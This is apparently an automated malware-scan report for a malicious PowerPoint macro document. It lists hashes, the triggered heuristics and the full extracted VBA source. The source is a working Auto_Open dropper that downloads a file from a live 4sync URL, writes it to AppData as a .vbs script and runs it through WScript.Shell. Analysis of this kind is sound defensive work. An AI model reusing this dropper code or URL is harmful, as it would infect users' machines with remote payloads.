Office (OOXML) malware analysis — malicious · 9e6cf11a1c975706

MALICIOUS

Office (OOXML)

7.5 KB First seen: 2021-04-10

MD5: 0583877caea3476c9bceea2fab010e6f SHA-1: eadf8e54f60b87272ad4456e341c712dc012971b SHA-256: 9e6cf11a1c9757069f6b016be382a4b92aedbb40de95bd728f28879f648ad211

298 Risk Score

Heuristics 9

VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Dim Shell
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set objShell = CreateObject("WScript.Shell")
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
 .write X1X.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Dim X1X: Set X1X = CreateObject("Microsoft.XMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Public Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
F3F = Environ("AppDATA")
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://dc708.4sync.com/download/OuaUpz2w/K6_online.JPG?dsid=-oCzo6PE.2efe1600d97e747a26cea9350fb0d6bc&sbsr=be4f75969238073c99f1aa929a19476ca71&bip=MjAxLjIwLjY2LjQz&lgfp=40 Referenced by macro
- https://dc708.4sync.com/download/OuaUpz2w/K6_online.JPG?dsid=-oCzo6PE.2efe1600d97e747a26cea9350fb0d6bc&sbsr=be4f75969238073c99f1aa929a19476ca71&bip=MjAxLjIwLjY2LjQz&lgfp=40�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	660 bytes
SHA-256: `1f6eab210bc0dd0ba9517435b2db5c7ffc5c65e15b0cd6aaa18feb95f4eddbfc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YMFMU" Public Sub Auto_Open() Dim X1X: Set X1X = CreateObject("Microsoft.XMLHTTP") Dim D2D: Set D2D = CreateObject("Adodb.Stream") X1X.Open "GET", "https://dc708.4sync.com/download/OuaUpz2w/K6_online.JPG?dsid=-oCzo6PE.2efe1600d97e747a26cea9350fb0d6bc&sbsr=be4f75969238073c99f1aa929a19476ca71&bip=MjAxLjIwLjY2LjQz&lgfp=40", False X1X.Send Dim F3F As String F3F = Environ("AppDATA") With D2D .Type = 1 .Open .write X1X.responseBody .savetofile F3F & "\OFJFT.vbs", 2 End With Dim Shell Set objShell = CreateObject("WScript.Shell") objShell.CurrentDirectory = F3F objShell.Run "OFJFT.vbs" End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: ppt/vbaProject.bin	14336 bytes
SHA-256: `ab365982b64bcd572a5e74926bb57ad0b64dd006bcb5cd84ce7e9d5c78782982`

Open this report in the interactive analyzer, or submit your own file for analysis.